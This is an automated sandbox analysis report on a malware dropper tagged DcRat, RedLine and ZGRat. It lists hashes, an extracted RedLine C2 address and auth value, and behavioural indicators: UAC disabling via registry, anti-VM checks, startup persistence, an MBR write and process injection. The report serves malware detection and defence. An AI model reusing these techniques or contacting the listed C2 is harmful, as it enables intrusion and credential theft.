dcrat | 0c951f58a23cd2c9bdccb727d41e33e740344af36d91419907ce016977b2a62d

max time kernel
933s
max time network
1801s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
10-01-2024 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

dcrat redline zgrat kent bootkit evasion infostealer persistence rat spyware themida trojan upx

Malware Config

Extracted

Family

redline

Botnet

kent

89.23.98.143:11627

Attributes

auth_value
24d164ebaf8f462b9dc88d186199283b

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
C:\hypersavesIntoRuntime\p5DlgEMx5gYcoGktfGFhOQrx.exe	family_zgrat_v1

Process spawned unexpected child process 24 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6140	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2148	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4800	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1956	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5580	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4016	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5104	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1380	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6020	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6044	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6056	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5692	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1964	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6008	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3104	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5296	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3208	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5444	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5604	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5448	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5796	816	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2884	816	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 4304 created 96 4304 svchost.exe 4363463463464363463463463.exe
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

description	pid	process	target process
PID 4304 created 96	4304	svchost.exe	4363463463464363463463463.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Windows\it-IT\wscript.exe	dcrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

brg.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ brg.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exenetsh.exe

pid process

824 netsh.exe
4676 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	brg.exe

pid	process
824	netsh.exe
4676	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

brg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	brg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	brg.exe

Drops startup file 4 IoCs

Processes:

jsc.exeConhost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ephmm803xl4Xt4c0wIYM16Zs.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iIVeYgr4qCwFFqneJCi6oflw.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3yznG8ez4XFRVpTTGtT8TbfI.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe	Conhost.exe

Executes dropped EXE 20 IoCs

Processes:

Temp2.exeasg.exetuc5.exetuc5.tmpbrg.exeVLTKBacdau.exetuc6.exetuc6.tmptuc2.exetuc2.tmpsvchost.exeVCDDaemon.exeDefenderControl.exeConhost.exeWerFault.exeqemu-ga.exereg.exesouth.exesmell-the-roses.exe3Nh3iUB0ixXPS46jElx130zZ.exe

pid	process
5096	Temp2.exe
4936	asg.exe
4224	tuc5.exe
168	tuc5.tmp
2504	brg.exe
1604	VLTKBacdau.exe
400	tuc6.exe
4500	tuc6.tmp
2176	tuc2.exe
2880	tuc2.tmp
4304	svchost.exe
2544	VCDDaemon.exe
832	DefenderControl.exe
3608	Conhost.exe
200	WerFault.exe
2400	qemu-ga.exe
1516	reg.exe
3640	south.exe
2252	smell-the-roses.exe
524	3Nh3iUB0ixXPS46jElx130zZ.exe

Loads dropped DLL 16 IoCs

Processes:

tuc5.tmptuc6.tmptuc2.tmpVCDDaemon.exesmell-the-roses.exe

pid	process
168	tuc5.tmp
168	tuc5.tmp
168	tuc5.tmp
4500	tuc6.tmp
4500	tuc6.tmp
4500	tuc6.tmp
2880	tuc2.tmp
2880	tuc2.tmp
2880	tuc2.tmp
2544	VCDDaemon.exe
2544	VCDDaemon.exe
2544	VCDDaemon.exe
2544	VCDDaemon.exe
2544	VCDDaemon.exe
2252	smell-the-roses.exe
2252	smell-the-roses.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\brg.exe	themida
C:\Users\Admin\AppData\Local\Temp\Files\brg.exe	themida
behavioral2/memory/2504-209-0x0000000000CB0000-0x0000000001228000-memory.dmp	themida
behavioral2/memory/2504-244-0x0000000000CB0000-0x0000000001228000-memory.dmp	themida

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\odg2FEYTs5iKvF4RVV78MLvT.exe	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

brg.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA brg.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 ip-api.com
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

VLTKBacdau.exe

description ioc process

File opened for modification \??\PhysicalDrive0 VLTKBacdau.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	brg.exe

flow	ioc
18	ip-api.com

description	ioc	process
File opened for modification	\??\PhysicalDrive0	VLTKBacdau.exe

Drops file in System32 directory 4 IoCs

Processes:

Temp2.exeasg.exe

description	ioc	process
File created	C:\Windows\SysWOW64\SubDir\asg.exe	Temp2.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\asg.exe	Temp2.exe
File opened for modification	C:\Windows\SysWOW64\SubDir\asg.exe	asg.exe
File opened for modification	C:\Windows\SysWOW64\SubDir	asg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

brg.exe

pid process

2504 brg.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

brg.exeVCDDaemon.execmd.exereg.exe

description	pid	process	target process
PID 2504 set thread context of 508	2504	brg.exe	AppLaunch.exe
PID 2544 set thread context of 4368	2544	VCDDaemon.exe	cmd.exe
PID 4368 set thread context of 536	4368	cmd.exe	MSBuild.exe
PID 1516 set thread context of 1472	1516	reg.exe	jsc.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1108 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1108	sc.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4436	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
4404	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
4132	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
2264	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
2352	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
4976	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
1320	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
3996	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
220	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
1796	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
2808	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
424	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
4284	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
2384	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
3652	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
4700	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
1272	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
3480	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
2324	2924	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
1352	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1744	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1880	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
3376	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
2020	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1952	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1172	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
4716	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
3692	1936	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
3024	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
4668	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
1384	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
2336	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
3368	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
2748	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
1172	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
4040	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
4160	2232	WerFault.exe	tWRDOwBPjdPxOfJwvJzJ05pQ.exe
2244	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1296	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
4976	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1012	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
4792	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
4436	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1748	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
4896	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
8	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1512	2844	WerFault.exe	csrss.exe
4520	2844	WerFault.exe	csrss.exe
4432	2844	WerFault.exe	csrss.exe
1756	2844	WerFault.exe	csrss.exe
740	2844	WerFault.exe	csrss.exe
2376	2844	WerFault.exe	csrss.exe
3004	2844	WerFault.exe	csrss.exe
4568	2844	WerFault.exe	csrss.exe
2500	2844	WerFault.exe	csrss.exe
2284	2844	WerFault.exe	csrss.exe
4404	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1560	3620	WerFault.exe	K9LUequqNCUJChLdY7ffYqtv.exe
1904	2844	WerFault.exe	csrss.exe
4788	2844	WerFault.exe	csrss.exe
4388	2844	WerFault.exe	csrss.exe
4528	2844	WerFault.exe	csrss.exe
4040	2844	WerFault.exe	csrss.exe
1296	2844	WerFault.exe	csrss.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Program Files (x86)\ClocX\uninst.exe	nsis_installer_1
C:\Program Files (x86)\ClocX\uninst.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 42 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4800	schtasks.exe
5104	schtasks.exe
1380	schtasks.exe
4108	schtasks.exe
4372	schtasks.exe
4660	schtasks.exe
5276	schtasks.exe
6028	schtasks.exe
5604	schtasks.exe
3480	schtasks.exe
5480	schtasks.exe
2148	schtasks.exe
2356	schtasks.exe
4736	schtasks.exe
4016	schtasks.exe
5692	schtasks.exe
3208	schtasks.exe
5796	schtasks.exe
1388	schtasks.exe
1168	schtasks.exe
5328	schtasks.exe
3104	schtasks.exe
5444	schtasks.exe
3876	schtasks.exe
2356	schtasks.exe
6020	schtasks.exe
6044	schtasks.exe
5296	schtasks.exe
6008	schtasks.exe
4884	schtasks.exe
3172	schtasks.exe
2244	schtasks.exe
6140	schtasks.exe
6056	schtasks.exe
1956	schtasks.exe
1964	schtasks.exe
5448	schtasks.exe
1908	schtasks.exe
4404	schtasks.exe
5920	schtasks.exe
5580	schtasks.exe
2884	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

2384 timeout.exe
5136 timeout.exe
Runs net.exe

pid	process
2384	timeout.exe
5136	timeout.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

brg.exesvchost.exeVCDDaemon.execmd.exeConhost.exepowershell.exe

pid	process
2504	brg.exe
2504	brg.exe
4304	svchost.exe
4304	svchost.exe
2544	VCDDaemon.exe
2544	VCDDaemon.exe
4368	cmd.exe
4368	cmd.exe
3608	Conhost.exe
4556	powershell.exe
4556	powershell.exe
4556	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

VLTKBacdau.exeDefenderControl.exe

pid process

1604 VLTKBacdau.exe
832 DefenderControl.exe
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

VCDDaemon.execmd.exe

pid process

2544 VCDDaemon.exe
4368 cmd.exe
4368 cmd.exe

pid	process
1604	VLTKBacdau.exe
832	DefenderControl.exe

pid	process
2544	VCDDaemon.exe
4368	cmd.exe
4368	cmd.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

Processes:

4363463463464363463463463.exeTemp2.exeasg.exebrg.exeVLTKBacdau.exeMSBuild.exeConhost.exereg.exepowershell.exejsc.exe

description	pid	process
Token: SeDebugPrivilege	96	4363463463464363463463463.exe
Token: SeDebugPrivilege	5096	Temp2.exe
Token: SeDebugPrivilege	4936	asg.exe
Token: SeDebugPrivilege	2504	brg.exe
Token: SeDebugPrivilege	1604	VLTKBacdau.exe
Token: SeDebugPrivilege	536	MSBuild.exe
Token: SeDebugPrivilege	3608	Conhost.exe
Token: SeDebugPrivilege	1516	reg.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeIncreaseQuotaPrivilege	4556	powershell.exe
Token: SeSecurityPrivilege	4556	powershell.exe
Token: SeTakeOwnershipPrivilege	4556	powershell.exe
Token: SeLoadDriverPrivilege	4556	powershell.exe
Token: SeSystemProfilePrivilege	4556	powershell.exe
Token: SeSystemtimePrivilege	4556	powershell.exe
Token: SeProfSingleProcessPrivilege	4556	powershell.exe
Token: SeIncBasePriorityPrivilege	4556	powershell.exe
Token: SeCreatePagefilePrivilege	4556	powershell.exe
Token: SeBackupPrivilege	4556	powershell.exe
Token: SeRestorePrivilege	4556	powershell.exe
Token: SeShutdownPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeSystemEnvironmentPrivilege	4556	powershell.exe
Token: SeRemoteShutdownPrivilege	4556	powershell.exe
Token: SeUndockPrivilege	4556	powershell.exe
Token: SeManageVolumePrivilege	4556	powershell.exe
Token: 33	4556	powershell.exe
Token: 34	4556	powershell.exe
Token: 35	4556	powershell.exe
Token: 36	4556	powershell.exe
Token: SeDebugPrivilege	1472	jsc.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

tuc5.tmptuc6.tmptuc2.tmpDefenderControl.exe

pid	process
168	tuc5.tmp
4500	tuc6.tmp
2880	tuc2.tmp
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

DefenderControl.exe

pid	process
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe
832	DefenderControl.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

asg.exesvchost.exesouth.exe

pid process

4936 asg.exe
4304 svchost.exe
4304 svchost.exe
3640 south.exe

pid	process
4936	asg.exe
4304	svchost.exe
4304	svchost.exe
3640	south.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exeTemp2.exeasg.exetuc5.exebrg.exetuc6.exetuc2.exesvchost.exeVCDDaemon.execmd.exeConhost.exe

description	pid	process	target process
PID 96 wrote to memory of 5096	96	4363463463464363463463463.exe	Temp2.exe
PID 96 wrote to memory of 5096	96	4363463463464363463463463.exe	Temp2.exe
PID 5096 wrote to memory of 4884	5096	Temp2.exe	schtasks.exe
PID 5096 wrote to memory of 4884	5096	Temp2.exe	schtasks.exe
PID 5096 wrote to memory of 4936	5096	Temp2.exe	asg.exe
PID 5096 wrote to memory of 4936	5096	Temp2.exe	asg.exe
PID 4936 wrote to memory of 3876	4936	asg.exe	schtasks.exe
PID 4936 wrote to memory of 3876	4936	asg.exe	schtasks.exe
PID 96 wrote to memory of 4224	96	4363463463464363463463463.exe	tuc5.exe
PID 96 wrote to memory of 4224	96	4363463463464363463463463.exe	tuc5.exe
PID 96 wrote to memory of 4224	96	4363463463464363463463463.exe	tuc5.exe
PID 4224 wrote to memory of 168	4224	tuc5.exe	tuc5.tmp
PID 4224 wrote to memory of 168	4224	tuc5.exe	tuc5.tmp
PID 4224 wrote to memory of 168	4224	tuc5.exe	tuc5.tmp
PID 96 wrote to memory of 2504	96	4363463463464363463463463.exe	brg.exe
PID 96 wrote to memory of 2504	96	4363463463464363463463463.exe	brg.exe
PID 96 wrote to memory of 2504	96	4363463463464363463463463.exe	brg.exe
PID 2504 wrote to memory of 508	2504	brg.exe	AppLaunch.exe
PID 2504 wrote to memory of 508	2504	brg.exe	AppLaunch.exe
PID 2504 wrote to memory of 508	2504	brg.exe	AppLaunch.exe
PID 2504 wrote to memory of 508	2504	brg.exe	AppLaunch.exe
PID 2504 wrote to memory of 508	2504	brg.exe	AppLaunch.exe
PID 2504 wrote to memory of 508	2504	brg.exe	AppLaunch.exe
PID 2504 wrote to memory of 508	2504	brg.exe	AppLaunch.exe
PID 2504 wrote to memory of 508	2504	brg.exe	AppLaunch.exe
PID 96 wrote to memory of 1604	96	4363463463464363463463463.exe	VLTKBacdau.exe
PID 96 wrote to memory of 1604	96	4363463463464363463463463.exe	VLTKBacdau.exe
PID 96 wrote to memory of 1604	96	4363463463464363463463463.exe	VLTKBacdau.exe
PID 96 wrote to memory of 400	96	4363463463464363463463463.exe	tuc6.exe
PID 96 wrote to memory of 400	96	4363463463464363463463463.exe	tuc6.exe
PID 96 wrote to memory of 400	96	4363463463464363463463463.exe	tuc6.exe
PID 400 wrote to memory of 4500	400	tuc6.exe	tuc6.tmp
PID 400 wrote to memory of 4500	400	tuc6.exe	tuc6.tmp
PID 400 wrote to memory of 4500	400	tuc6.exe	tuc6.tmp
PID 96 wrote to memory of 2176	96	4363463463464363463463463.exe	tuc2.exe
PID 96 wrote to memory of 2176	96	4363463463464363463463463.exe	tuc2.exe
PID 96 wrote to memory of 2176	96	4363463463464363463463463.exe	tuc2.exe
PID 2176 wrote to memory of 2880	2176	tuc2.exe	tuc2.tmp
PID 2176 wrote to memory of 2880	2176	tuc2.exe	tuc2.tmp
PID 2176 wrote to memory of 2880	2176	tuc2.exe	tuc2.tmp
PID 96 wrote to memory of 4304	96	4363463463464363463463463.exe	svchost.exe
PID 96 wrote to memory of 4304	96	4363463463464363463463463.exe	svchost.exe
PID 96 wrote to memory of 4304	96	4363463463464363463463463.exe	svchost.exe
PID 4304 wrote to memory of 2544	4304	svchost.exe	VCDDaemon.exe
PID 4304 wrote to memory of 2544	4304	svchost.exe	VCDDaemon.exe
PID 4304 wrote to memory of 2544	4304	svchost.exe	VCDDaemon.exe
PID 2544 wrote to memory of 4368	2544	VCDDaemon.exe	cmd.exe
PID 2544 wrote to memory of 4368	2544	VCDDaemon.exe	cmd.exe
PID 2544 wrote to memory of 4368	2544	VCDDaemon.exe	cmd.exe
PID 2544 wrote to memory of 4368	2544	VCDDaemon.exe	cmd.exe
PID 4368 wrote to memory of 536	4368	cmd.exe	MSBuild.exe
PID 4368 wrote to memory of 536	4368	cmd.exe	MSBuild.exe
PID 4368 wrote to memory of 536	4368	cmd.exe	MSBuild.exe
PID 4368 wrote to memory of 536	4368	cmd.exe	MSBuild.exe
PID 96 wrote to memory of 832	96	4363463463464363463463463.exe	DefenderControl.exe
PID 96 wrote to memory of 832	96	4363463463464363463463463.exe	DefenderControl.exe
PID 96 wrote to memory of 832	96	4363463463464363463463463.exe	DefenderControl.exe
PID 96 wrote to memory of 3608	96	4363463463464363463463463.exe	Conhost.exe
PID 96 wrote to memory of 3608	96	4363463463464363463463463.exe	Conhost.exe
PID 96 wrote to memory of 3608	96	4363463463464363463463463.exe	Conhost.exe
PID 96 wrote to memory of 200	96	4363463463464363463463463.exe	WerFault.exe
PID 96 wrote to memory of 200	96	4363463463464363463463463.exe	WerFault.exe
PID 3608 wrote to memory of 2400	3608	Conhost.exe	qemu-ga.exe
PID 3608 wrote to memory of 2400	3608	Conhost.exe	qemu-ga.exe

Uses Task Scheduler COM API 1 TTPs
